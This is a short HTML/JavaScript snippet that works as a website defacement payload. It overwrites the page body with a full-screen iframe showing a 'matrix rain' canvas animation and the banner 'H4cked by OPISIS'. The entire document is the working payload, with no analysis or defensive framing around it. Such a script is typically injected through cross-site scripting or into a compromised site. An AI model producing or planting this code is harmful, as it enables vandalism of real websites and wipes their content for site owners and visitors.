<script>
document.body.innerHTML = `
<iframe style="position:fixed;top:0;left:0;width:100vw;height:100vh;border:none;z-index:9999;" srcdoc="
<style>
body { margin: 0; background: black; overflow: hidden; }
canvas { display: block; }
h1 { position: absolute; top: 40%; width: 100%; text-align: center; color: lime; font-size: 40px; z-index: 10; font-family: monospace; }
</style>
<canvas id='matrix'></canvas>
<h1>H4cked by OPISIS</h1>
<script>
const canvas = document.getElementById('matrix');
const ctx = canvas.getContext('2d');
canvas.width = window.innerWidth;
canvas.height = window.innerHeight;
const chars = 'アカサタナハマヤラワ0123456789'.split('');
const fontSize = 14;
const columns = Math.floor(canvas.width / fontSize);
const drops = Array(columns).fill(1);
function draw() {
ctx.fillStyle = 'rgba(0, 0, 0, 0.05)';
ctx.fillRect(0, 0, canvas.width, canvas.height);
ctx.fillStyle = '#0F0';
ctx.font = fontSize + 'px monospace';
for (let i = 0; i < drops.length; i++) {
const text = chars[Math.floor(Math.random() * chars.length)];
ctx.fillText(text, i * fontSize, drops[i] * fontSize);
if (drops[i] * fontSize > canvas.height && Math.random() > 0.975) {
drops[i] = 0;
}
drops[i]++;
}
}
setInterval(draw, 33);
<\/script>
"></iframe>
`;
</script>